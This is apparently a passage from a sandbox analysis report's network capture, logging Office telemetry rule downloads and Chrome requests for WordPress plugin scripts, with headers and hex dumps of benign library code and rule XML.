                                                                                                                                          2024-11-28 10:33:19 UTC5629INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 2f 2a 21 0a 20 2a 20 69 6d 61 67 65 73 4c 6f 61 64 65 64 20 50 41 43 4b 41 47 45 44 20 76 34 2e 31 2e 34 0a 20 2a 20 4a 61 76 61 53 63 72 69 70 74 20 69 73 20 61 6c 6c 20 6c 69 6b 65 20 22 59 6f 75 20 69 6d 61 67 65 73 20 61 72 65 20 64 6f 6e 65 20 79 65 74 20 6f 72 20 77 68 61 74 3f 22 0a 20 2a 20 4d 49 54 20 4c 69 63 65 6e 73 65 0a 20 2a 2f 0a 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 65 76 2d 65 6d 69 74 74 65 72 2f 65 76 2d 65 6d 69 74 74 65 72 22 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66
                                                                                                                                          Data Ascii: /*! This file is auto-generated *//*! * imagesLoaded PACKAGED v4.1.4 * JavaScript is all like "You images are done yet or what?" * MIT License */!function(e,t){"function"==typeof define&&define.amd?define("ev-emitter/ev-emitter",t):"object"==typeof


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          133192.168.2.44989513.107.246.63443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:19 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                          2024-11-28 10:33:19 UTC470INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:19 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 448
                                                                                                                                          Connection: close
                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                          ETag: "0x8DC582BB389F49B"
                                                                                                                                          x-ms-request-id: c6635303-801e-0083-091e-41f0ae000000
                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                          x-azure-ref: 20241128T103319Z-174f7845968cdxdrhC1EWRg0en0000000yag00000000284f
                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-28 10:33:19 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          134192.168.2.44989713.107.246.63443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:19 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                          2024-11-28 10:33:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:20 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 491
                                                                                                                                          Connection: close
                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                          ETag: "0x8DC582B98B88612"
                                                                                                                                          x-ms-request-id: 22106228-c01e-007a-5d36-40b877000000
                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                          x-azure-ref: 20241128T103320Z-174f7845968xlwnmhC1EWR0sv80000000y1g000000008z19
                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-28 10:33:20 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          135192.168.2.44989813.107.246.63443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:20 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                          2024-11-28 10:33:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:20 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 416
                                                                                                                                          Connection: close
                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                                          ETag: "0x8DC582BAEA4B445"
                                                                                                                                          x-ms-request-id: 3fc8ca9f-401e-0083-6c91-3f075c000000
                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                          x-azure-ref: 20241128T103320Z-174f7845968xr5c2hC1EWRd0hn0000000f30000000007z5e
                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-28 10:33:20 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          136192.168.2.44990013.107.246.63443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:21 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                          2024-11-28 10:33:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:21 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 415
                                                                                                                                          Connection: close
                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                          ETag: "0x8DC582BA80D96A1"
                                                                                                                                          x-ms-request-id: 3b640fd5-a01e-0053-6c1f-418603000000
                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                          x-azure-ref: 20241128T103321Z-174f7845968pght8hC1EWRyvxg00000001g0000000002n38
                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-28 10:33:21 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          137192.168.2.44989913.107.246.63443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:21 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                          2024-11-28 10:33:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:21 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 479
                                                                                                                                          Connection: close
                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                          ETag: "0x8DC582B989EE75B"
                                                                                                                                          x-ms-request-id: 59a03737-a01e-00ab-1891-3f9106000000
                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                          x-azure-ref: 20241128T103321Z-174f7845968jrjrxhC1EWRmmrs0000000yc0000000007cfu
                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-28 10:33:21 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          138192.168.2.4499015.57.41.1194432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:21 UTC416OUTGET /wp-content/plugins/tailor/assets/js/dist/vendor/shuffle.min.js?ver=1.8.2 HTTP/1.1
                                                                                                                                          Host: www.agriparadigma.it
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:33:21 UTC316INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:21 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Last-Modified: Tue, 13 Mar 2018 12:53:50 GMT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 14308
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          Expires: Fri, 28 Nov 2025 10:33:21 GMT
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/javascript
                                                                                                                                          2024-11-28 10:33:21 UTC7876INData Raw: 2f 2a 21 20 53 68 75 66 66 6c 65 2e 6a 73 20 33 2e 31 2e 31 20 2d 20 4d 49 54 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 29 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 2c 22 6d 6f 64 65 72 6e 69 7a 72 22 5d 2c 61 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 61 28 72 65 71 75 69 72 65 28 22 6a 71 75 65 72 79 22 29 2c 77 69 6e 64 6f 77 2e 4d 6f 64 65 72 6e 69 7a 72 29 3a 77 69 6e 64 6f 77 2e 53 68 75 66 66 6c 65 3d 61 28 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 2c 77 69 6e 64 6f 77 2e 4d 6f 64 65 72 6e 69 7a 72 29 7d 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c
                                                                                                                                          Data Ascii: /*! Shuffle.js 3.1.1 - MIT */!function(a){"function"==typeof define&&define.amd?define(["jquery","modernizr"],a):"object"==typeof exports?module.exports=a(require("jquery"),window.Modernizr):window.Shuffle=a(window.jQuery,window.Modernizr)}(function(a,b,
                                                                                                                                          2024-11-28 10:33:21 UTC6432INData Raw: 6f 6e 28 62 2c 63 29 7b 76 61 72 20 64 3d 61 28 62 29 2c 65 3d 64 2e 64 61 74 61 28 29 2c 66 3d 65 2e 70 6f 69 6e 74 2c 67 3d 65 2e 73 63 61 6c 65 2c 68 3d 7b 77 69 64 74 68 3a 45 2e 5f 67 65 74 4f 75 74 65 72 57 69 64 74 68 28 62 2c 21 30 29 2c 68 65 69 67 68 74 3a 45 2e 5f 67 65 74 4f 75 74 65 72 48 65 69 67 68 74 28 62 2c 21 30 29 7d 2c 69 3d 74 68 69 73 2e 5f 67 65 74 49 74 65 6d 50 6f 73 69 74 69 6f 6e 28 68 29 3b 41 2e 65 71 75 61 6c 73 28 66 2c 69 29 26 26 67 3d 3d 3d 78 7c 7c 28 65 2e 70 6f 69 6e 74 3d 69 2c 65 2e 73 63 61 6c 65 3d 78 2c 74 68 69 73 2e 73 74 79 6c 65 51 75 65 75 65 2e 70 75 73 68 28 7b 24 69 74 65 6d 3a 64 2c 70 6f 69 6e 74 3a 69 2c 73 63 61 6c 65 3a 78 2c 6f 70 61 63 69 74 79 3a 63 3f 30 3a 31 2c 73 6b 69 70 54 72 61 6e 73 69 74
                                                                                                                                          Data Ascii: on(b,c){var d=a(b),e=d.data(),f=e.point,g=e.scale,h={width:E._getOuterWidth(b,!0),height:E._getOuterHeight(b,!0)},i=this._getItemPosition(h);A.equals(f,i)&&g===x||(e.point=i,e.scale=x,this.styleQueue.push({$item:d,point:i,scale:x,opacity:c?0:1,skipTransit


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          139192.168.2.44990213.107.246.63443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:21 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                          2024-11-28 10:33:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:21 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 471
                                                                                                                                          Connection: close
                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                          ETag: "0x8DC582B97E6FCDD"
                                                                                                                                          x-ms-request-id: dcf51672-d01e-005a-5c91-3f7fd9000000
                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                          x-azure-ref: 20241128T103321Z-174f7845968nxc96hC1EWRspw80000000xzg000000007ty6
                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-28 10:33:22 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          140192.168.2.44990313.107.246.63443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:22 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                          2024-11-28 10:33:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:22 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 419
                                                                                                                                          Connection: close
                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                          ETag: "0x8DC582B9C710B28"
                                                                                                                                          x-ms-request-id: 5cf18767-601e-000d-7d91-3f2618000000
                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                          x-azure-ref: 20241128T103322Z-174f7845968xr5c2hC1EWRd0hn0000000f4g000000005nph
                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-28 10:33:22 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          141192.168.2.44990413.107.246.63443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:22 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                          2024-11-28 10:33:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:22 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 477
                                                                                                                                          Connection: close
                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                                          ETag: "0x8DC582BA54DCC28"
                                                                                                                                          x-ms-request-id: 7af319f3-d01e-0017-6a91-3fb035000000
                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                          x-azure-ref: 20241128T103322Z-174f7845968nxc96hC1EWRspw80000000xzg000000007tzc
                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-28 10:33:22 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          142192.168.2.4499075.57.41.1194432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:23 UTC423OUTGET /wp-content/plugins/tailor/assets/js/dist/vendor/magnific-popup.min.js?ver=1.8.2 HTTP/1.1
                                                                                                                                          Host: www.agriparadigma.it
                                                                                                                                          Connection: keep-alive
